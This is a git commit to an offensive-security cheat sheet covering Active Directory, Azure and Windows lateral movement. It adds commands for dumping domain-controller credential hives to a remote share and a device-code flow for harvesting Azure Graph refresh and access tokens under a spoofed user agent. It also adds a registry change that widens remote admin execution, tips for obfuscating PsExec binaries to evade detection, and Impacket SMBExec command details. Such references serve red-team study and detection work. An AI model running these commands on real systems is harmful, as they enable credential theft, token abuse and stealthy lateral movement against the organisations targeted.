SMBExec + Refresh & Access Token Azure

2024-06-28 09:53:26 +00:00 · 2023-02-15 17:03:49 +01:00 · 2023-02-15 17:03:49 +01:00 · 8442b304c9
commit 8442b304c9
parent 411f2455a9
3 changed files with 122 additions and 41 deletions
--- a/Resources/Active
+++ b/Resources/Active
@ -2966,6 +2966,9 @@ This groups grants the following privileges :
  $winlogon = $reg.OpenSubKey('SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon')
  $winlogon.GetValueNames() | foreach {"$_ : $(($winlogon).GetValue($_))"}
  ```
+* Retrieve SAM,SECURITY and SYSTEM hives
+  * [mpgn/BackupOperatorToDA](https://github.com/mpgn/BackupOperatorToDA): `.\BackupOperatorToDA.exe -t \\dc1.lab.local -u user -p pass -d domain -o \\10.10.10.10\SHARE\`
+  * [improsec/BackupOperatorToolkit](https://github.com/improsec/BackupOperatorToolkit): `.\BackupOperatorToolkit.exe DUMP \\PATH\To\Dump \\TARGET.DOMAIN.DK`


 ### Abusing Active Directory ACLs/ACEs
--- a/Resources/Cloud
+++ b/Resources/Cloud
@ -3,6 +3,9 @@
 ## Summary

 * [Azure Recon Tools](#azure-recon-tools)
+* [Authenticating to the Microsoft Graph API in PowerShell](#authenticating-to-the-microsoft-graph-api-in-powershell)
+    * [Graph API Refresh Token](#graph-api-refresh-token)
+    * [Graph API Access Token](#graph-api-access-token)
 * [Terminology](#terminology)
 * [Training](#training)
 * [Enumeration](#enumeration)
@ -60,35 +63,6 @@

 ## Azure Recon Tools

-* [**ROADTool**](https://github.com/dirkjanm/ROADtools) - The Azure AD exploration framework.
-    ```powershell
-    pipenv shell
-    roadrecon auth [-h] [-u USERNAME] [-p PASSWORD] [-t TENANT] [-c CLIENT] [--as-app] [--device-code] [--access-token ACCESS_TOKEN] [--refresh-token REFRESH_TOKEN] [-f TOKENFILE] [--tokens-stdout]
-    roadrecon gather [-h] [-d DATABASE] [-f TOKENFILE] [--tokens-stdin] [--mfa]
-    roadrecon auth -u test@<TENANT NAME>.onmicrosoft.com -p <PASSWORD>
-    roadrecon gather
-    roadrecon gui
-    ```
-* [**Azure/StormSpotter**](https://github.com/Azure/Stormspotter) - Azure Red Team tool for graphing Azure and Azure Active Directory objects
-    ```powershell
-    # session 1 - backend
-    pipenv shell
-    python ssbackend.pyz
-
-    # session 2 - frontend
-    cd C:\Tools\stormspotter\frontend\dist\spa\
-    quasar.cmd serve -p 9091 --history
-
-    # session 3 - collector
-    pipenv shell
-    az login -u test@<TENANT NAME>.onmicrosoft.com -p <PASSWORD>
-    python C:\Tools\stormspotter\stormcollector\sscollector.pyz cli
-
-    # Web access on http://localhost:9091
-    Username: neo4j
-    Password: BloodHound
-    Server: bolt://localhost:7687
-    ```
 * [**BloodHoundAD/AzureHound**](https://github.com/BloodHoundAD/AzureHound) - Azure Data Exporter for BloodHound
    ```powershell
    # First, retrieve a refresh token (-r) if username/password isn't supported.
@ -98,6 +72,8 @@
    $rt = (Get-AADIntAccessToken -ClientId "1950a258-227b-4e31-a9cf-717495945fc2" -Resource "https://graph.microsoft.com" -PRTToken (Get-AADIntUserPRTToken) -IncludeRefreshToken $true)[1]
    
    # Second, launch azurehound collector
+    ./azurehound -r "0.AXMAMe..." list --tenant "753a0bc5-..." -o output.json
+
    ## Connects on your Azure account using the refresh token provided and the tenant of the account
    ## and collects every possible objects in contoso.microsoft.com. Results are stored in json
    ./azurehound -r $rt --tenant "contoso.onmicrosoft.com" list -o azurehound-scan.json --tenant "contoso.microsoft.com"
@ -141,13 +117,42 @@
    MATCH p = (n)-[r]->(g:AZKeyVault) RETURN p
    MATCH (n) WHERE n.azname IS NOT NULL AND n.azname <> "" AND n.name IS NULL SET n.name = n.azname
    ```
-* [BloodHoundAD/BARK](https://github.com/BloodHoundAD/BARK) - BloodHound Attack Research Kit
+* [**BloodHoundAD/BARK**](https://github.com/BloodHoundAD/BARK) - BloodHound Attack Research Kit
    ```ps1
    . .\BARK.ps1
    $MyRefreshTokenRequest = Get-AZRefreshTokenWithUsernamePassword -username "user@contoso.onmicrosoft.com" -password "MyVeryCoolPassword" -TenantID "contoso.onmicrosoft.com"
    $MyMSGraphToken = Get-MSGraphTokenWithRefreshToken -RefreshToken $MyRefreshTokenRequest.refresh_token -TenantID "contoso.onmicrosoft.com"
    $MyAADUsers = Get-AllAzureADUsers -Token $MyMSGraphToken.access_token -ShowProgress
    ```
+* [**ROADTool**](https://github.com/dirkjanm/ROADtools) - The Azure AD exploration framework.
+    ```powershell
+    pipenv shell
+    roadrecon auth [-h] [-u USERNAME] [-p PASSWORD] [-t TENANT] [-c CLIENT] [--as-app] [--device-code] [--access-token ACCESS_TOKEN] [--refresh-token REFRESH_TOKEN] [-f TOKENFILE] [--tokens-stdout]
+    roadrecon gather [-h] [-d DATABASE] [-f TOKENFILE] [--tokens-stdin] [--mfa]
+    roadrecon auth -u test@<TENANT NAME>.onmicrosoft.com -p <PASSWORD>
+    roadrecon gather
+    roadrecon gui
+    ```
+* [**Azure/StormSpotter**](https://github.com/Azure/Stormspotter) - Azure Red Team tool for graphing Azure and Azure Active Directory objects
+    ```powershell
+    # session 1 - backend
+    pipenv shell
+    python ssbackend.pyz
+
+    # session 2 - frontend
+    cd C:\Tools\stormspotter\frontend\dist\spa\
+    quasar.cmd serve -p 9091 --history
+
+    # session 3 - collector
+    pipenv shell
+    az login -u test@<TENANT NAME>.onmicrosoft.com -p <PASSWORD>
+    python C:\Tools\stormspotter\stormcollector\sscollector.pyz cli
+
+    # Web access on http://localhost:9091
+    Username: neo4j
+    Password: BloodHound
+    Server: bolt://localhost:7687
+    ```
 * [**Microsoft Portals**](https://msportals.io/) - Microsoft Administrator Sites
 * [**nccgroup/Azucar**](https://github.com/nccgroup/azucar.git) : Azucar automatically gathers a variety of configuration data and analyses all data relating to a particular subscription in order to determine security risks.
    ```powershell
@ -208,6 +213,59 @@
    $ Create-Backdoor, Execute-Backdoor
    ```

+## Authenticating to the Microsoft Graph API in PowerShell
+
+* [Microsoft Applications ID](https://learn.microsoft.com/fr-fr/troubleshoot/azure/active-directory/verify-first-party-apps-sign-in)
+
+| Name                       | GUID                                 |
+|----------------------------|--------------------------------------|
+| Microsoft Azure PowerShell | 1950a258-227b-4e31-a9cf-717495945fc2 |	
+| Microsoft Azure CLI	     | 04b07795-8ddb-461a-bbee-02f9e1bf7b46 |
+| Portail Azure              | c44b4083-3bb0-49c1-b47d-974e53cbdf3c |	
+
+
+### Graph API Refresh Token
+
+Authenticating to the Microsoft Graph API in PowerShell
+
+```ps1
+$body = @{
+    "client_id" =     "1950a258-227b-4e31-a9cf-717495945fc2"
+    "resource" =      "https://graph.microsoft.com" # Microsoft Graph API 
+}
+$UserAgent = "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36"
+$Headers=@{}
+$Headers["User-Agent"] = $UserAgent
+$authResponse = Invoke-RestMethod `
+    -UseBasicParsing `
+    -Method Post `
+    -Uri "https://login.microsoftonline.com/common/oauth2/devicecode?api-version=1.0" `
+    -Headers $Headers `
+    -Body $body
+$authResponse
+```
+
+### Graph API Access Token
+
+This request require getting the Refresh Token.
+
+```ps1
+$body=@{
+    "client_id" =  "1950a258-227b-4e31-a9cf-717495945fc2"
+    "grant_type" = "urn:ietf:params:oauth:grant-type:device_code"
+    "code" =       $authResponse.device_code
+}
+$Tokens = Invoke-RestMethod `
+    -UseBasicParsing `
+    -Method Post `
+    -Uri "https://login.microsoftonline.com/Common/oauth2/token?api-version=1.0" `
+    -Headers $Headers `
+    -Body $body
+$Tokens
+```
+
+
+
 ## Terminology

 > Basic Azure AD terminologies
--- a/Resources/Windows
+++ b/Resources/Windows
@ -11,6 +11,7 @@
 * [Impacket](#impacket)
    * [PSExec](#psexec)
    * [WMIExec](#wmiexec)
+    * [SMBExec](#smbexec)

 * [RDP Remote Desktop Protocol](#rdp-remote-desktop-protocol)
 * [Powershell Remoting Protocol](#powershell-remoting-protocol)
@ -123,13 +124,13 @@ From [fortra/impacket](https://github.com/fortra/impacket) (:warning: renamed to
 All Impacket's *exec scripts are not equal, they will target services hosted on multiples ports. 
 The following table summarize the port used by each scripts.

-| Method      | Port Used                             |
-|-------------|---------------------------------------|
-| psexec.py   | tcp/445                               |
-| smbexec.py  | tcp/445                               |
-| atexec.py   | tcp/445                               |
-| dcomexec.py | tcp/135, tcp/445, tcp/49751 (DCOM)    |
-| wmiexec.py  | tcp/135, tcp/445, tcp/50911 (Winmgmt) |
+| Method      | Port Used                             | Admin Required |
+|-------------|---------------------------------------|----------------|
+| psexec.py   | tcp/445                               | Yes            |
+| smbexec.py  | tcp/445                               | No             |
+| atexec.py   | tcp/445                               | No             |
+| dcomexec.py | tcp/135, tcp/445, tcp/49751 (DCOM)    | No             |
+| wmiexec.py  | tcp/135, tcp/445, tcp/50911 (Winmgmt) | Yes            |

 * `psexec`: equivalent of Windows PSEXEC using RemComSvc binary.
    ```ps1
@ -153,15 +154,23 @@ The following table summarize the port used by each scripts.
    wmiexec.py DOMAIN/username@10.10.10.10 -hashes aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0
    ```

+To allow Non-RID 500 local admin accounts performing Wmi or PsExec, execute: 
+`reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v LocalAccountTokenFilterPolicy /t REG_DWORD /f /d 1`
+To prevent RID 500 from being able to WmiExec or PsExec, execute:
+`reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v FilterAdministratorToken /t REG_DWORD /f /d 1`
+
+
 ### PSExec

-PSExec default [kavika13/RemCom](https://github.com/kavika13/RemCom) binary is 10 years old, you might want to rebuild it and obfuscate it to reduce detections [snovvcrash/RemComObf.sh](https://gist.github.com/snovvcrash/123945e8f06c7182769846265637fedb)
+Instead of uploading `psexeccsv` service binary, it uploads to `ADMIN$` a service binary with an arbitrary name.
+PSExec default [kavika13/RemCom](https://github.com/kavika13/RemCom) binary is 10 years old, you might want to rebuild it and obfuscate it to reduce detections ([snovvcrash/RemComObf.sh](https://gist.github.com/snovvcrash/123945e8f06c7182769846265637fedb))

 Use a custom binary and service name with : `psexec.py Administrator:Password123@IP -service-name customservicename -remote-binary-name custombin.exe`    

 Also a custom file can be specified with the parameter : `-file /tmp/RemComSvcCustom.exe`.    
 You need to update the pipe name to match "Custom_communication" in the line 163     
-`fid_main = self.openPipe(s,tid,r'\RemCom_communicaton',0x12019f)` 
+`fid_main = self.openPipe(s,tid,r'\RemCom_communicaton',0x12019f)`. Alternatively you can use the fork [ThePorgs/impacket](https://github.com/ThePorgs/impacket/pull/3/files).
+

 ### WMIExec

@ -169,6 +178,15 @@ Use a non default share `-share SHARE` to write the output to reduce the detecti
 By default this command is executed : `cmd.exe /Q /c cd 1> \\127.0.0.1\ADMIN$\__RANDOM 2>&1`


+### SMBExec
+
+It creates a service with the name `BTOBTO` ([smbexec.py#L59](https://github.com/fortra/impacket/blob/master/examples/smbexec.py#L59)) and transfers commands from the attacker in a bat file in `%TEMP/execute.bat` ([smbexec.py#L56](https://github.com/fortra/impacket/blob/master/examples/smbexec.py#L56)).
+
+It will create a new service every time we execute a command. It will also generate an Event 7045.
+
+By default this command is execute: `%COMSPEC% /Q /c echo dir > \\127.0.0.1\C$\__output 2>&1 > %TEMP%\execute.bat & %COMSPEC% /Q /c %TEMP%\execute.bat & del %TEMP%\execute.bat`, where `%COMSPEC%` points to `C:\WINDOWS\system32\cmd.exe`.
+
+
 ## RDP Remote Desktop Protocol 

 :warning: **NOTE**: You may need to enable RDP and disable NLA and fix CredSSP errors.
@ -216,7 +234,6 @@ Abuse RDP protocol to execute commands remotely with the following commands;
    ```


-
 ## Powershell Remoting Protocol

 ### Powershell Credentials
@ -339,5 +356,8 @@ PS C:\> runas /noprofil /netonly /user:DOMAIN\username cmd.exe
 - [Ropnop - Using credentials to own Windows boxes](https://blog.ropnop.com/using-credentials-to-own-windows-boxes/)
 - [Ropnop - Using credentials to own Windows boxes Part 2](https://blog.ropnop.com/using-credentials-to-own-windows-boxes-part-2-psexec-and-services/)
 - [Gaining Domain Admin from Outside Active Directory](https://markitzeroday.com/pass-the-hash/crack-map-exec/2018/03/04/da-from-outside-the-domain.html)
- [Impacket Remote code execution on Windows from Linux by Vry4n_ | Jun 20, 2021](https://vk9-sec.com/impacket-remote-code-execution-rce-on-windows-from-linux/)
+- [Impacket Remote code execution on Windows from Linux by Vry4n_ - Jun 20, 2021](https://vk9-sec.com/impacket-remote-code-execution-rce-on-windows-from-linux/)
 - [Impacket Exec Commands Cheat Sheet - 13cubed](https://www.13cubed.com/downloads/impacket_exec_commands_cheat_sheet.pdf)
+- [SMB protocol cheatsheet - aas-s3curity](https://aas-s3curity.gitbook.io/cheatsheet/internalpentest/active-directory/post-exploitation/lateral-movement/smb-protocol)
+- [Windows Lateral Movement with smb, psexec and alternatives - nv2lt](https://nv2lt.github.io/windows/smb-psexec-smbexec-winexe-how-to/)
+- [PsExec.exe IOCs and Detection - Threatexpress](https://threatexpress.com/redteaming/tool_ioc/psexec/)